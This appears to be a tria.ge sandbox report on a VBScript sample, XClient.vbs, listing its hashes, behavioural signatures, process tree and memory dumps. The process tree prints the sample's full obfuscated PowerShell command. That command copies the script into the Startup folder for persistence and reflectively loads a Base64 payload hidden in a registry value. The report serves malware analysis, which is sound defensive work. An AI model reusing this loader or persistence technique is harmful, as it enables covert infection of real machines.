Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

XClient.vbs

windows7-x64

3

XClient.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    25/06/2024, 18:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    XClient.vbs

  • Size

    51KB

  • MD5

    b2d3d950c164eac3905adf7449bbc102

  • SHA1

    bfa01bfaa12aefce0bc8f7468ce788d78623c56d

  • SHA256

    79ba69baace5e2b30cdc18e8ab462692e3337640f52f532743ffb2a52c281694

  • SHA512

    6032364e7b7e107f0813eee20304ec31e65747b10174fba9d703d20c010c8785df515a0789f8e813484ae7d09e972100b2dd08df46dcb0844e9911feddadab74

  • SSDEEP

    1536:daxTfSWi9SkelLyAPh0voJKfI2rygScsddWZrv+Va:0xTfk9reVUvWII2oJdWZT+Va

Score
3/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\XClient.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\XClient.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.vbs'; $possessiveness = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $possessiveness = -join $possessiveness[-1..-$possessiveness.Length];[<##>AppDomain<##>]::<##>('merelsurrentDomain'.replace('merels','C'))<##>.<##>('liquationoad'.replace('liquation','L'))([Convert]::FromBase64String($possessiveness))<##>.<##>('microzoarianntryPoint'.replace('microzoarian','E'))<##>.<##>('Inconfrontmentoke'.replace('confrontment','v'))($Null,$Null)<##>;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3004

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3004-4-0x000007FEF5F9E000-0x000007FEF5F9F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3004-5-0x000000001B880000-0x000000001BB62000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/3004-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3004-7-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3004-8-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3004-9-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

    Filesize

    9.6MB

    Download